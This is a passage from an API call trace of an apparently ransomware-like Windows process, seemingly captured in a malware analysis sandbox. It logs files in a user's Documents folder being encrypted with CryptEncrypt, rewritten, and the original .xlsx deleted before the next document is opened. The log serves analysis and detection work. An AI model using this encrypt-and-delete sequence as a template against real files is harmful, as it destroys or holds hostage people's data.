lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.734] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x13819, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x13820) returned 1 [0077.734] CharLowerBuffW (in: lpsz="byte[79905]", cchLength=0xb | out: lpsz="byte[79905]") returned 0xb [0077.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.735] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x492a8c0*, pdwDataLen=0x144e790*=0x13819, dwBufLen=0x13820 | out: pbData=0x492a8c0*, pdwDataLen=0x144e790*=0x13820) returned 1 [0077.735] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.738] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x13820, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x13820, lpOverlapped=0x0) returned 1 [0077.745] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca568, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.745] CryptDestroyKey (hKey=0x41ac200) returned 1 [0077.745] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.745] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0077.746] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0077.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.746] FreeLibrary (hLibModule=0x756e0000) returned 1 [0077.746] CloseHandle (hObject=0x258) returned 1 [0077.746] CloseHandle (hObject=0x298) returned 1 [0077.755] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx", lpFilePart=0x0) returned 0x2d [0077.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0077.756] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ookroy8wprtqcj.xlsx")) returned 0x20 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.756] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c3a9160, ftCreationTime.dwHighDateTime=0x1d5ea19, ftLastAccessTime.dwLowDateTime=0x30900180, ftLastAccessTime.dwHighDateTime=0x1d5e70e, ftLastWriteTime.dwLowDateTime=0x30900180, ftLastWriteTime.dwHighDateTime=0x1d5e70e, nFileSizeHigh=0x0, nFileSizeLow=0x13819, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ooKroY8WpRTqCJ.xlsx", cAlternateFileName="OOKROY~1.XLS")) returned 0x41ac2c0 [0077.757] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ookroy8wprtqcj.xlsx")) returned 1 [0077.760] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c3a9160, ftCreationTime.dwHighDateTime=0x1d5ea19, ftLastAccessTime.dwLowDateTime=0x30900180, ftLastAccessTime.dwHighDateTime=0x1d5e70e, ftLastWriteTime.dwLowDateTime=0x30900180, ftLastWriteTime.dwHighDateTime=0x1d5e70e, nFileSizeHigh=0x0, nFileSizeLow=0x13819, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="ooKroY8WpRTqCJ.xlsx", cAlternateFileName="OOKROY~1.XLS")) returned 0 [0077.761] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.761] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.762] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0077.762] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.762] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.762] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.762] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0077.762] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0077.764] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0077.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.764] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.768] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\oZbDkszpyQazC9.docx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadbfd0d0, ftCreationTime.dwHighDateTime=0x1d5b0eb, ftLastAccessTime.dwLowDateTime=0xacc27920, ftLastAccessTime.dwHighDateTime=0x1d5bce0, ftLastWriteTime.dwLowDateTime=0xacc27920, ftLastWriteTime.dwHighDateTime=0x1d5bce0, nFileSizeHigh=0x0, nFileSizeLow=0x13e27, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="oZbDkszpyQazC9.docx", cAlternateFileName="OZBDKS~1.DOC")) returned 0x41ac440 [0077.768] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0077.768] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.769] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.769] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d70 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0077.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 